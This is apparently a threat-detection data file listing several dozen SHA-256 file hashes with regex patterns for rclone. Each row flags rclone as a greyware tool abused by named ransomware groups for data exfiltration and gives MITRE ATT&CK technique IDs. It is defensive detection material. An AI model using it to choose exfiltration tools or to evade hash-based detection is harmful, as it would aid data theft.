"*2f23c814d800ebaf516418f4cde8dcfc04fb6f50f343ef8ac94d40066463fd78*",".{0,1000}2f23c814d800ebaf516418f4cde8dcfc04fb6f50f343ef8ac94d40066463fd78.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2f3d3e246dcff30bd0f9c1d2918e276d118658c53f2a414852c34af1d935b9d1*",".{0,1000}2f3d3e246dcff30bd0f9c1d2918e276d118658c53f2a414852c34af1d935b9d1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2f545953aefbb11842c6152dc1eb4b0ad576c7f3d648ef2ce762679bd45b6771*",".{0,1000}2f545953aefbb11842c6152dc1eb4b0ad576c7f3d648ef2ce762679bd45b6771.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2f925ad68e769796a2b1d6bc7c09ce44164b192f30dbc94c3902a427d38f459b*",".{0,1000}2f925ad68e769796a2b1d6bc7c09ce44164b192f30dbc94c3902a427d38f459b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2fa7c005c6cc92c0f79b288471e7f555672583aca74cdc223881b07d98794390*",".{0,1000}2fa7c005c6cc92c0f79b288471e7f555672583aca74cdc223881b07d98794390.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2fe30d5fe08c566db85ac6ac32cfe92afd66b24aa2ecc8263c86c3bc8a1260d1*",".{0,1000}2fe30d5fe08c566db85ac6ac32cfe92afd66b24aa2ecc8263c86c3bc8a1260d1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*302d86070ce4c463d98f5217f85e9fa79b798d80948097d6847d38813a44a769*",".{0,1000}302d86070ce4c463d98f5217f85e9fa79b798d80948097d6847d38813a44a769.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*30340c4d6f41f2565c2bb369f45e789a67409c7ed18008a5fbad5d087b2f00b2*",".{0,1000}30340c4d6f41f2565c2bb369f45e789a67409c7ed18008a5fbad5d087b2f00b2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*308c29b3d5768de138fa87755f165d95aa021c78564f4740102628acc7e4a2aa*",".{0,1000}308c29b3d5768de138fa87755f165d95aa021c78564f4740102628acc7e4a2aa.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*308f634fd322185fc1bb9b371be9ea5d8509c979f73f77a70d0ad75dba2799c1*",".{0,1000}308f634fd322185fc1bb9b371be9ea5d8509c979f73f77a70d0ad75dba2799c1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*30d8f383f5472499fe1b395778196adb4ad6b000245b0c4786c398f3291f78aa*",".{0,1000}30d8f383f5472499fe1b395778196adb4ad6b000245b0c4786c398f3291f78aa.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*30e21bf4f47fa0edf53e738c13fdc4ee0a22f1b544165cbef1d362a25c1714c9*",".{0,1000}30e21bf4f47fa0edf53e738c13fdc4ee0a22f1b544165cbef1d362a25c1714c9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*310cc90d4dc88a16e78873ceb1eb4e337e8039ec392df36073900b766585d0fb*",".{0,1000}310cc90d4dc88a16e78873ceb1eb4e337e8039ec392df36073900b766585d0fb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*310e8f12c406cfe608fd6feec36bdb122180c3e13a179eb638593bf97b79fc9f*",".{0,1000}310e8f12c406cfe608fd6feec36bdb122180c3e13a179eb638593bf97b79fc9f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3149fa9e7dcbe7b1992fb9475f76fd2d0ebad88318c9497fd34ced76b3c9150d*",".{0,1000}3149fa9e7dcbe7b1992fb9475f76fd2d0ebad88318c9497fd34ced76b3c9150d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*315aa5d2bb34c286245719163ffb168ef69e17c1f2fd0d4a9f7b0feb203d1d53*",".{0,1000}315aa5d2bb34c286245719163ffb168ef69e17c1f2fd0d4a9f7b0feb203d1d53.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*31c80fc12c2b391726f2a026981e0ce53bf6e68e55e4288f2b2662445d667ef5*",".{0,1000}31c80fc12c2b391726f2a026981e0ce53bf6e68e55e4288f2b2662445d667ef5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*31fb21714d9ecb2e14dd5f34680bcbb1167cfc72d6433e193d061a9bc34b27c5*",".{0,1000}31fb21714d9ecb2e14dd5f34680bcbb1167cfc72d6433e193d061a9bc34b27c5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*31fb7bc782823a725a7fc61e590911ddeac1989e10ab67fe5bba42c355d58b7f*",".{0,1000}31fb7bc782823a725a7fc61e590911ddeac1989e10ab67fe5bba42c355d58b7f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*321889f1b67fe66ee689b320e977646ddec0544fc89a23ad54e49408f7a4ae5e*",".{0,1000}321889f1b67fe66ee689b320e977646ddec0544fc89a23ad54e49408f7a4ae5e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*32bc7de6f818df84a75f7ed501f1a152bb7a606687cd700b0144719261e3524d*",".{0,1000}32bc7de6f818df84a75f7ed501f1a152bb7a606687cd700b0144719261e3524d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*331052f70446cec6cc6392f80aac15a71b4e987b506b5ec3e6aada2b555a5ed9*",".{0,1000}331052f70446cec6cc6392f80aac15a71b4e987b506b5ec3e6aada2b555a5ed9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*333c5aa4c44f10b270cfd2c4d2bd58ec2615cd8874a9e8896c05ea3810b50395*",".{0,1000}333c5aa4c44f10b270cfd2c4d2bd58ec2615cd8874a9e8896c05ea3810b50395.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*333fe7eb77d75398f57ac89dff603d71f9fe0857decee22e276a5734ea11b6ac*",".{0,1000}333fe7eb77d75398f57ac89dff603d71f9fe0857decee22e276a5734ea11b6ac.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*335e0c71b9818e5d688121452eadca3107ade9e60a36af0328e2843a70b2ebfb*",".{0,1000}335e0c71b9818e5d688121452eadca3107ade9e60a36af0328e2843a70b2ebfb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*33604e221e6a0b033d4f00192bac45ed68d4f29fe1be7c14314ea6e6add7f2cb*",".{0,1000}33604e221e6a0b033d4f00192bac45ed68d4f29fe1be7c14314ea6e6add7f2cb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*33ab89888c82d2e34bf39998f3070105b6d67911dbf89084fa185a0058e70692*",".{0,1000}33ab89888c82d2e34bf39998f3070105b6d67911dbf89084fa185a0058e70692.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*33b86805dca512c7216444a881630170042d43acabc30cfd17ce4f1f95318bcc*",".{0,1000}33b86805dca512c7216444a881630170042d43acabc30cfd17ce4f1f95318bcc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*33e707f51a0012e333c2646c6b1458f389b5192bbfcced6b41ca1c3725b53a98*",".{0,1000}33e707f51a0012e333c2646c6b1458f389b5192bbfcced6b41ca1c3725b53a98.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*340371f94604e6771cc4a2c91e37d1bf00a524deab520340440fb0968e783f63*",".{0,1000}340371f94604e6771cc4a2c91e37d1bf00a524deab520340440fb0968e783f63.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3435ba98d798b679b5b6dac4b04fd440389f1a3a4992ac998fe5231b2a83cbe4*",".{0,1000}3435ba98d798b679b5b6dac4b04fd440389f1a3a4992ac998fe5231b2a83cbe4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3445e757daa58d7e316d8d5bd308bccb43bcaf8504e17305a7c849b919a52d99*",".{0,1000}3445e757daa58d7e316d8d5bd308bccb43bcaf8504e17305a7c849b919a52d99.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3458ddb17264d13bba09748cf14ea009b123f67823d1d5b7e6f8b0e8edbd238b*",".{0,1000}3458ddb17264d13bba09748cf14ea009b123f67823d1d5b7e6f8b0e8edbd238b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*345f591a27c4b776215371a38f0ad8159357d30e9c1860c420a7eab8b5f0f63c*",".{0,1000}345f591a27c4b776215371a38f0ad8159357d30e9c1860c420a7eab8b5f0f63c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*34710e9813ebda068adcec9296582c8396c1576532a77e86cca9245c549e6eac*",".{0,1000}34710e9813ebda068adcec9296582c8396c1576532a77e86cca9245c549e6eac.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*348f4866ac76baf0405695404432c5192faed33da7b8faea07947ba7427c688c*",".{0,1000}348f4866ac76baf0405695404432c5192faed33da7b8faea07947ba7427c688c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
